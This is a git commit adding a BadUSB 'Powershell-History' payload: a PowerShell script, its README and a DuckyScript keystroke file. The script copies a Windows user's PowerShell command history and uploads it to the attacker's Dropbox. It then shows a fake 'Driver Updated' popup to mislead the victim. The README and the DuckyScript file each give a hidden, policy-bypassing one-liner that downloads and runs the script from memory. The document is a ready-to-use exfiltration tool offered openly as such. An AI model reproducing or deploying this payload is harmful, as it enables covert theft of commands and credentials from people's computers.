commit
afd456627d
|
@ -0,0 +1,45 @@
|
||||||
|
#Powershell-History
|
||||||
|
|
||||||
|
# See if file is a thing
|
||||||
|
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
|
||||||
|
|
||||||
|
#If the file does not exist, write to host.
|
||||||
|
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
|
||||||
|
try {
|
||||||
|
Write-Host "The Powershell History file has not been found. "
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
throw $_.Exception.Message
|
||||||
|
}
|
||||||
|
}
|
||||||
|
# Copy Powershell History to Temp Directory to get sent to Dropbox
|
||||||
|
else {
|
||||||
|
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
|
||||||
|
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function DropBox-Upload {
|
||||||
|
|
||||||
|
[CmdletBinding()]
|
||||||
|
param (
|
||||||
|
|
||||||
|
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
||||||
|
[Alias("f")]
|
||||||
|
[string]$SourceFilePath
|
||||||
|
)
|
||||||
|
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
|
||||||
|
$outputFile = Split-Path $SourceFilePath -leaf
|
||||||
|
$TargetFilePath="/$outputFile"
|
||||||
|
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||||
|
$authorization = "Bearer " + $DropBoxAccessToken
|
||||||
|
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||||
|
$headers.Add("Authorization", $authorization)
|
||||||
|
$headers.Add("Dropbox-API-Arg", $arg)
|
||||||
|
$headers.Add("Content-Type", 'application/octet-stream')
|
||||||
|
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
|
}
|
||||||
|
|
||||||
|
DropBox-Upload -f "$env:tmp/$F1"
|
||||||
|
|
||||||
|
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
|
|
@ -0,0 +1,110 @@
|
||||||
|
<h1 align="center">
|
||||||
|
<a href="https://git.io/typing-svg">
|
||||||
|
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈¢er=true&size=30">
|
||||||
|
</a>
|
||||||
|
</h1>
|
||||||
|
|
||||||
|
<!-- TABLE OF CONTENTS -->
|
||||||
|
<details>
|
||||||
|
<summary>Table of Contents</summary>
|
||||||
|
<ol>
|
||||||
|
<li><a href="#Description">Description</a></li>
|
||||||
|
<li><a href="#getting-started">Getting Started</a></li>
|
||||||
|
<li><a href="#Contributing">Contributing</a></li>
|
||||||
|
<li><a href="#Version-History">Version History</a></li>
|
||||||
|
<li><a href="#Contact">Contact</a></li>
|
||||||
|
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||||
|
</ol>
|
||||||
|
</details>
|
||||||
|
|
||||||
|
# Powershell-History
|
||||||
|
|
||||||
|
A payload to exfiltrate the history of the powershell console
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
|
||||||
|
|
||||||
|
These files will be saved to the temp directory
|
||||||
|
|
||||||
|
Finally dropbox will be used to exfiltrate the files to cloud storage
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||||
|
* Windows 10
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||||
|
```
|
||||||
|
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
|
||||||
|
```
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
## Contributing
|
||||||
|
|
||||||
|
All contributors names will be listed here
|
||||||
|
|
||||||
|
atomiczsec
|
||||||
|
|
||||||
|
I am Jakoby
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
## Version History
|
||||||
|
|
||||||
|
* 0.1
|
||||||
|
* Initial Release
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
<!-- CONTACT -->
|
||||||
|
## Contact
|
||||||
|
|
||||||
|
<h2 align="center">📱 My Socials 📱</h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
|
||||||
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
|
||||||
|
</a>
|
||||||
|
<br>YouTube
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://twitter.com/atomiczsec">
|
||||||
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
|
||||||
|
</a>
|
||||||
|
<br>Twitter
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://discord.gg/MYYER2ZcJF">
|
||||||
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
|
||||||
|
</a>
|
||||||
|
<br>I-Am-Jakoby's Discord
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||||
|
|
||||||
|
<!-- ACKNOWLEDGMENTS -->
|
||||||
|
## Acknowledgments
|
||||||
|
|
||||||
|
* [Hak5](https://hak5.org/)
|
||||||
|
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
|
||||||
|
|
||||||
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,16 @@
|
||||||
|
REM Title: Powershell-History
|
||||||
|
|
||||||
|
REM Author: atomiczsec
|
||||||
|
|
||||||
|
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
|
||||||
|
|
||||||
|
REM Target: Windows 10
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|
Loading…
Reference in New Issue